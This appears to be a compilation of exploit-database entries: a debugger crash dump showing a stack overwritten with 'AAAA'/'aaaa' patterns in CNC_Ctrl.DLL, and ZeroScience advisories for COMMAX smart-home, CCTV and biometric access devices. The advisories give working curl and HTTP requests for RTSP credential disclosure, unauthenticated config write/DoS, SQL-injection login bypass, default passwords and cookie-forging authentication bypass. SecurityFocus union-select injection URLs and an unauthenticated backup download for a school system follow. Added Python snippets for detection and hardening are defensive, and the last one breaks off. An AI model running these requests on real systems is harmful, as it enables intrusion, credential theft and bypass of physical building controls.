APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  784

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  LAB17

ANALYSIS_SESSION_TIME:  08-12-2021 13:37:16.0907

ANALYSIS_VERSION: 10.0.16299.91 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  ENU

PROBLEM_CLASSES: 

    ID:     [0n301]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n274]
    Type:   [INVALID_POINTER_WRITE]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n152]
    Type:   [ZEROED_STACK]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [0x56e4]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

IP_ON_HEAP:  61616161
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 61616161

FRAME_ONE_INVALID: 1

LAST_CONTROL_TRANSFER:  from 61616161 to 10027da1

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3
00afe298 61616161 61616161 61616161 61616161 0x61616161
00afe29c 61616161 61616161 61616161 61616161 0x61616161
00afe2a0 61616161 61616161 61616161 61616161 0x61616161
00afe2a4 61616161 61616161 61616161 61616161 0x61616161
00afe2a8 61616161 61616161 61616161 61616161 0x61616161
00afe2ac 61616161 61616161 61616161 61616161 0x61616161
00afe2b0 61616161 61616161 61616161 61616161 0x61616161
00afe2b4 61616161 61616161 61616161 61616161 0x61616161
00afe2b8 61616161 61616161 61616161 61616161 0x61616161
00afe2bc 61616161 61616161 61616161 61616161 0x61616161
00afe2c0 61616161 61616161 61616161 61616161 0x61616161
00afe2c4 61616161 61616161 61616161 61616161 0x61616161
00afe2c8 61616161 61616161 61616161 61616161 0x61616161
00afe2cc 61616161 61616161 61616161 61616161 0x61616161
00afe2d0 61616161 61616161 61616161 61616161 0x61616161
00afe2d4 61616161 61616161 61616161 61616161 0x61616161
00afe2d8 61616161 61616161 61616161 61616161 0x61616161
00afe2dc 61616161 61616161 61616161 61616161 0x61616161
00afe2e0 61616161 61616161 61616161 61616161 0x61616161
00afe2e4 61616161 61616161 61616161 61616161 0x61616161
00afe2e8 61616161 61616161 61616161 61616161 0x61616161
00afe2ec 61616161 61616161 61616161 61616161 0x61616161
00afe2f0 61616161 61616161 61616161 61616161 0x61616161
00afe2f4 61616161 61616161 61616161 61616161 0x61616161
00afe2f8 61616161 61616161 61616161 61616161 0x61616161
00afe2fc 61616161 61616161 61616161 61616161 0x61616161
00afe300 61616161 61616161 61616161 61616161 0x61616161
00afe304 61616161 61616161 61616161 61616161 0x61616161
00afe308 61616161 61616161 61616161 61616161 0x61616161
00afe30c 61616161 61616161 61616161 61616161 0x61616161
00afe310 61616161 61616161 61616161 61616161 0x61616161
00afe314 61616161 61616161 61616161 61616161 0x61616161
00afe318 61616161 61616161 61616161 41414141 0x61616161
00afe31c 61616161 61616161 41414141 41414141 0x61616161
00afe320 61616161 41414141 41414141 41414141 0x61616161
00afe324 41414141 41414141 41414141 41414141 0x61616161
00afe504 41414141 41414141 41414141 41414141 0x41414141
00afe508 41414141 41414141 41414141 41414141 0x41414141
00afe50c 41414141 41414141 41414141 41414141 0x41414141
00afe510 41414141 41414141 41414141 41414141 0x41414141
00afe514 41414141 41414141 41414141 41414141 0x41414141
00afe518 41414141 41414141 41414141 41414141 0x41414141
00afe51c 41414141 41414141 41414141 41414141 0x41414141
00afe520 41414141 41414141 41414141 41414141 0x41414141
00afe524 41414141 41414141 41414141 41414141 0x41414141
00afe528 41414141 41414141 41414141 41414141 0x41414141
00afe52c 41414141 41414141 41414141 41414141 0x41414141
00afe530 41414141 41414141 41414141 41414141 0x41414141
00afe534 41414141 41414141 41414141 41414141 0x41414141
00afe538 41414141 41414141 41414141 41414141 0x41414141
00afe53c 41414141 41414141 41414141 41414141 0x41414141
00afe540 41414141 41414141 41414141 41414141 0x41414141
00afe544 41414141 41414141 41414141 41414141 0x41414141
00afe548 41414141 41414141 41414141 41414141 0x41414141
00afe54c 41414141 41414141 41414141 41414141 0x41414141
00afe550 41414141 41414141 41414141 41414141 0x41414141
00afe554 41414141 41414141 41414141 41414141 0x41414141
00afe558 41414141 41414141 41414141 41414141 0x41414141
00afe55c 41414141 41414141 41414141 41414141 0x41414141
00afe560 41414141 41414141 41414141 41414141 0x41414141
00afe564 41414141 41414141 41414141 41414141 0x41414141
00afe568 41414141 41414141 41414141 41414141 0x41414141
00afe56c 41414141 41414141 41414141 41414141 0x41414141
00afe570 41414141 41414141 41414141 41414141 0x41414141
00afe574 41414141 41414141 41414141 41414141 0x41414141
00afe578 41414141 41414141 41414141 41414141 0x41414141
00afe57c 41414141 41414141 41414141 41414141 0x41414141
00afe580 41414141 41414141 41414141 41414141 0x41414141
00afe584 41414141 41414141 41414141 41414141 0x41414141
00afe588 41414141 41414141 41414141 41414141 0x41414141
00afe58c 41414141 41414141 41414141 41414141 0x41414141
00afe590 41414141 41414141 41414141 41414141 0x41414141
00afe594 41414141 41414141 41414141 41414141 0x41414141
00afe598 41414141 41414141 41414141 41414141 0x41414141
00afe59c 41414141 41414141 41414141 41414141 0x41414141
00afe5a0 41414141 41414141 41414141 41414141 0x41414141
00afe5a4 41414141 41414141 41414141 41414141 0x41414141
00afe5a8 41414141 41414141 41414141 41414141 0x41414141
00afe5ac 41414141 41414141 41414141 41414141 0x41414141
00afe5b0 41414141 41414141 41414141 41414141 0x41414141
00afe5b4 41414141 41414141 41414141 41414141 0x41414141
00afe5b8 41414141 41414141 41414141 41414141 0x41414141
00afe5bc 41414141 41414141 41414141 41414141 0x41414141
00afe5c0 41414141 41414141 41414141 41414141 0x41414141
00afe5c4 41414141 41414141 41414141 41414141 0x41414141
00afe5c8 41414141 41414141 41414141 41414141 0x41414141
00afe5cc 41414141 41414141 41414141 41414141 0x41414141
00afe5d0 41414141 41414141 41414141 41414141 0x41414141
00afe5d4 41414141 41414141 41414141 41414141 0x41414141
00afe5d8 41414141 41414141 41414141 41414141 0x41414141
00afe5dc 41414141 41414141 41414141 41414141 0x41414141
00afe5e0 41414141 41414141 41414141 41414141 0x41414141
00afe5e4 41414141 41414141 41414141 41414141 0x41414141
00afe5e8 41414141 41414141 41414141 41414141 0x41414141
00afe5ec 41414141 41414141 41414141 41414141 0x41414141
00afe5f0 41414141 41414141 41414141 41414141 0x41414141
00afe5f4 41414141 41414141 41414141 41414141 0x41414141

STACK_COMMAND:  ~0s ; .cxr ; kb

THREAD_SHA1_HASH_MOD_FUNC:  1ff3866701b0a93c59477aaf393ad9182c6cbb4f

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  31358b3bd1a2fecfa57be49dd21574669d1b1ea2

THREAD_SHA1_HASH_MOD:  2219bd78d12868af57c664db206871e4461019b1

FAULT_INSTR_CODE:  12d49989

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  CNC_Ctrl!DllUnregisterServer+18ee3

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: CNC_Ctrl

IMAGE_NAME:  CNC_Ctrl.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  547ed821

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  CNC_Ctrl.DLL

BUCKET_ID_IMAGE_STR:  CNC_Ctrl.DLL

FAILURE_MODULE_NAME:  CNC_Ctrl

BUCKET_ID_MODULE_STR:  CNC_Ctrl

FAILURE_FUNCTION_NAME:  DllUnregisterServer

BUCKET_ID_FUNCTION_STR:  DllUnregisterServer

BUCKET_ID_OFFSET:  18ee3

BUCKET_ID_MODTIMEDATESTAMP:  547ed821

BUCKET_ID_MODCHECKSUM:  357a4b

BUCKET_ID_MODVER_STR:  1.7.0.2

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  CNC_Ctrl.DLL!DllUnregisterServer

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1

TARGET_TIME:  2021-08-12T11:37:22.000Z

OSBUILD:  19042

OSSERVICEPACK:  1023

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS Personal

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  160101.0800

BUILDLAB_STR:  WinBuild

BUILDOSVER_STR:  10.0.19041.1023

ANALYSIS_SESSION_ELAPSED_TIME:  68b2

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver

FAILURE_ID_HASH:  {5e1e375a-c411-e928-cd64-b7f6c07eea3b}

Followup:     MachineOwner
---------
            
# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure

Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to read the RTSP credentials in plaintext.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php


02.08.2021

--


$ curl http://TARGET:8086/overview.asp
<HTML>
<HEAD>
<TITLE> Infomation</TITLE>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
</HEAD>
<BODY>
<br><br>
<center>
<table>
<tr><td>
<li> [2021/08/15 09:56:46]  Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <BR>
</td></tr>
</table>
</center>
</BODY>
</HTML>


$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");

document.domain = server_domain;

var cookiesAuth = $.cookie("cookiesAuth");

if (cookiesAuth != "authok") {
    parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
}
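As an added example (not part of the advisory or the vendor's code), a defender-side check that flags and redacts the kind of plaintext rtsp://user:password@host URL the overview.asp page above hands out; the sample response body, the `RtspCredentialLeak` type and the function names are constructed here, and the password-containing-`@` case from the advisory is handled:

```python
"""Find and redact RTSP URLs that embed credentials, as in the overview.asp
response above.

Added example, not code from the advisory or the vendor. It is written for the
defender's side: run it over saved HTTP responses, proxy captures or device
configuration exports to flag plaintext camera credentials before they spread.
The sample body below is constructed to mirror the advisory's output.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# The userinfo part may itself contain '@' and '$' (the advisory's example does),
# so the password is matched lazily and the host is whatever follows the last '@'
# that is followed by a plausible host[:port]. The path stops at whitespace or
# HTML delimiters so a trailing <BR> is not swallowed.
_RTSP_CRED_RE = re.compile(
    r"rtsp://(?P<user>[^:/\s@]+):(?P<password>\S+?)@"
    r"(?P<host>[A-Za-z0-9.\-]+)(?::(?P<port>\d{1,5}))?(?P<path>/[^\s<>\"']*)?",
    re.IGNORECASE,
)

# Constructed sample, modelled on the advisory's overview.asp body (not real data).
SAMPLE_OVERVIEW_HTML = (
    "<li> [2021/08/15 09:56:46]  Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>"
    "[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <BR>"
    "[2] rtsp://viewer:hunter2@cam2.example.internal/live <BR>"
    "[3] rtsp://10.0.0.19:554/nocreds <BR>"  # no userinfo: must not be reported
)


@dataclass(frozen=True)
class RtspCredentialLeak:
    user: str
    password: str
    host: str
    port: int
    path: str


def find_rtsp_credential_leaks(body: str) -> list[RtspCredentialLeak]:
    """Return every rtsp:// URL in body that carries user:password@ userinfo."""
    leaks = []
    for m in _RTSP_CRED_RE.finditer(body):
        leaks.append(
            RtspCredentialLeak(
                user=m.group("user"),
                password=m.group("password"),
                host=m.group("host"),
                port=int(m.group("port") or 554),  # 554 is the RTSP default
                path=m.group("path") or "/",
            )
        )
    return leaks


def redact_rtsp_credentials(body: str) -> str:
    """Replace the password of every leaked URL with '***', leaving the rest
    intact so the redacted copy can still be used for inventory or ticketing."""

    def _redact(m: re.Match) -> str:
        whole = m.group(0)
        start = m.start("password") - m.start()
        end = m.end("password") - m.start()
        return whole[:start] + "***" + whole[end:]

    return _RTSP_CRED_RE.sub(_redact, body)


if __name__ == "__main__":
    for leak in find_rtsp_credential_leaks(SAMPLE_OVERVIEW_HTML):
        print(f"leak: user={leak.user!r} host={leak.host}:{leak.port} path={leak.path}")
    print(redact_rtsp_credentials(SAMPLE_OVERVIEW_HTML))
```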
            
# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS


Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The application allows an unauthenticated attacker to change the configuration
of the DVR arguments and/or cause a denial-of-service condition through the setconf endpoint.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5666
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php


02.08.2021

--


#1

$ curl -X POST http://192.168.1.1:8086/goform/setconf --data "manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"

*   Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
> POST /goform/setconf HTTP/1.1
> Host: 192.168.1.1:8086
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 257
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 257 out of 257 bytes
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: GoAhead-Webs
< Pragma: no-cache
< Cache-control: no-cache
< Content-Type: text/html
<
<html>
<br><br><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html>
* Closing connection 0

#2

$ curl -v http://192.168.1.1:8086
* Rebuilt URL to: http://192.168.1.1:8086/
*   Trying 192.168.1.1...
* TCP_NODELAY set
* connect to 192.168.1.1 port 8086 failed: Connection refused
* Failed to connect to 192.168.1.1 port 8086: Connection refused
* Closing connection 0
curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
            
# Exploit Title: COMMAX Smart Home IoT Control System CDP-1020n - SQL Injection Authentication Bypass
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass


Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: CDP-1020n
                  481 System

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The application suffers from an SQL Injection vulnerability. Input passed
through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised
before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.

Tested on: Microsoft-IIS/7.5
           ASP.NET


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5662
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5662.php


02.08.2021

--


POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/mainstart.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: {}

id=%27+or+1%3D1--&x=0&y=0&pass=waddup


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 621
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: {}
X-Powered-By: ASP.NET
Date: Tue, 03 Aug 1984 22:57:56 GMT
            
# Exploit Title: COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure


Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: CVD-AH04 DVR 4.4.1
                  CVD-AF04 DVR 4.4.1
                  CVD-AH16 DVR 5.1.4
                  CVD-AF16 DVR 4.4.1
                  CVD-AF08 DVR 5.1.2
                  CVD-AH08 DVR 5.1.2

Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer
needs and convenience in single or multi-family homes.

Desc: The web control panel uses a weak set of default administrative credentials that
can easily be guessed in remote password attacks, disclosing the RTSP stream.

Tested on: Boa/0.94.14rc19


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5667
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php


02.08.2021

--


Login:
$ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d "passkey=1234"
HTTP/1.1 200 OK
Date: Mon, 16 Aug 2021 01:04:52 GMT
Server: Boa/0.94.14rc19
Accept-Ranges: bytes
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"  "http://www.w3.org/TR/html4/frameset.dtd">

IE (ActiveX) web player:
http://192.168.1.2/web_viewer2.html

Snapshots:
http://192.168.1.2/images/snapshot-01.jpg
http://192.168.1.2/images/snapshot-02.jpg
http://192.168.1.2/images/snapshot-nn.jpg


Creds:
Users: ADMIN,USER1,USER2,USER3
Password: 1234
            
# Exploit Title: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX Biometric Access Control System 1.0.0 Authentication Bypass


Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: 1.0.0

Summary: Biometric access control system.

Desc: The application suffers from an authentication bypass vulnerability.
An unauthenticated attacker through cookie poisoning can bypass authentication
and disclose sensitive information and circumvent physical controls in smart
homes and buildings.

Tested on: nginx/1.14.0 (Ubuntu)
           MariaDB/10.3.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5661
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php


02.08.2021

--


The following request, with forged cookies, bypasses authentication and lists the available SQL backups.

GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/user_add.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
Connection: close


HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 03 Aug 1984 14:07:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10316


<!DOCTYPE html>
<html class="no-js" lang="ko">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>::: COMMAX :::</title>
...
...
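An added example (not COMMAX's code) showing why a privilege level read from a client-supplied cookie such as CMX_ADMIN_LV cannot be trusted, beside an HMAC-signed session cookie that rejects the forged header above; the cookie names are the advisory's, while the CMX_SESSION cookie, its admin_id|level|tag layout, the function names and the server key are assumptions:

```python
"""Cookie-trust authorization (the flaw behind the db_dump.php bypass) beside a
signed-session replacement.

Added example, not COMMAX code. The cookie names are the ones from the forged
request above; the CMX_SESSION cookie format and the server key are assumptions.
"""
from __future__ import annotations

import hashlib
import hmac

ADMIN_LEVEL = 9  # the level the forged CMX_ADMIN_LV claims

# Cookie header taken from the advisory's request; every value is client-chosen.
FORGED_COOKIE_HEADER = (
    "CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; "
    "CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0"
)


def parse_cookie_header(header: str) -> dict[str, str]:
    """Split a Cookie: header into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def is_admin_vulnerable(cookies: dict[str, str]) -> bool:
    """The flawed pattern: the privilege level is read straight from the cookie,
    so whoever sends CMX_ADMIN_LV=9 is treated as an administrator."""
    level = cookies.get("CMX_ADMIN_LV", "")
    return level.isascii() and level.isdigit() and int(level) >= ADMIN_LEVEL


def issue_session(admin_id: str, level: int, key: bytes) -> str:
    """Server side: bind admin_id and level together under an HMAC the client
    cannot compute without `key`. Layout (assumed): admin_id|level|hex_tag."""
    payload = f"{admin_id}|{level}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def verify_session(cookie_value: str, key: bytes) -> tuple[str, int] | None:
    """Return (admin_id, level) only if the tag is valid for exactly this
    payload; editing the id, the level or the tag makes the check fail."""
    parts = cookie_value.rsplit("|", 2)
    if len(parts) != 3:
        return None
    admin_id, level, tag = parts
    if not (level.isascii() and level.isdigit()):
        return None
    expected = hmac.new(key, f"{admin_id}|{level}".encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison; compare bytes so a non-ASCII tag cannot raise.
    if not hmac.compare_digest(expected.encode(), tag.encode()):
        return None
    return admin_id, int(level)


def is_admin_signed(cookies: dict[str, str], key: bytes) -> bool:
    """Authorization from the signed cookie only; the CMX_ADMIN_LV value is ignored.
    Signing stops forgery but not replay of a stolen cookie, so pair it with
    HttpOnly/Secure flags and an expiry in the payload (not shown here)."""
    session = verify_session(cookies.get("CMX_SESSION", ""), key)
    return session is not None and session[1] >= ADMIN_LEVEL


if __name__ == "__main__":
    key = b"constructed-demo-key-real-keys-stay-on-the-server"
    forged = parse_cookie_header(FORGED_COOKIE_HEADER)
    print("cookie-trust check admits the forged request:", is_admin_vulnerable(forged))
    print("signed check admits it:", is_admin_signed(forged, key))
    low = issue_session("science", 1, key)
    print("tampered level verifies as:", verify_session(low.replace("|1|", "|9|"), key))
```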
            
source: https://www.securityfocus.com/bid/64707/info
         
Command School Student Management System is prone to the following security vulnerabilities:
         
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
         
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
         
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
            


##############
VULNERABILITY
##############

/Backup/backup_ray2.php (LINE: 78-126)

-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp   = fopen($bkup, "w");


// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
    $tables[] = $s[0];
}


// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{

// WRITE THE DROP TABLE STATEMENT
    fwrite($fp,"DROP TABLE `$table`;\n");

// GET THE CREATE TABLE STATEMENT
    $res = mysql_query("SHOW CREATE TABLE `$table`");
    if (!$res) die( mysql_error() );
    $cre = mysql_fetch_array($res);
    $cre[1] .= ";";
    $txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
    fwrite($fp, $txt . "\n");

// GET THE TABLE DATA
    $data = mysql_query("SELECT * FROM `$table`");
    $num  = mysql_num_fields($data);
    while ($row = mysql_fetch_array($data))
    {

// MAKE INSERT STATEMENTS FOR ALL THE VALUES
        $txt = "INSERT INTO `$table` VALUES(";
        for ($i=0; $i < $num; $i++)
        {
            $txt .= "'".mysql_real_escape_string($row[$i])."', ";
        }
        $txt = substr($txt, 0, -2);
        fwrite($fp, $txt . ");\n");
    }
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/sw/backup/backup_ray2.php" class="button
white">Backup Download</a></label>
</html>
            
source: https://www.securityfocus.com/bid/64707/info
        

http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
 

http://www.example.com/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
           

http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
   

http://www.example.com/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
  

http://www.example.com/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
          

http://www.example.com/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
       

http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
    

http://www.example.com/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
            
source: https://www.securityfocus.com/bid/64707/info
     

http://www.example.com/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info


http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
            
source: https://www.securityfocus.com/bid/64707/info
      

http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
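An added example (not code from either product) that replays both injection shapes on this page, the loginstart.asp id=' or 1=1-- bypass from the CDP-1020n advisory and the numeric id=null and 1=2 union select ... lookup in the Command School URLs, against an in-memory SQLite database, each beside its parameterized form; the tables, column names, function names and the sqlite_version() stand-in for MySQL's version() are constructed:

```python
"""Both injection shapes on this page, replayed against an in-memory SQLite DB.

Added example, not code from either product. (1) is the loginstart.asp-style
bypass with id=' or 1=1-- from the CDP-1020n advisory; (2) is the Command
School numeric id=null and 1=2 union select ... lookup, with version() swapped
for SQLite's sqlite_version(). Table and column names are constructed.
"""
import sqlite3

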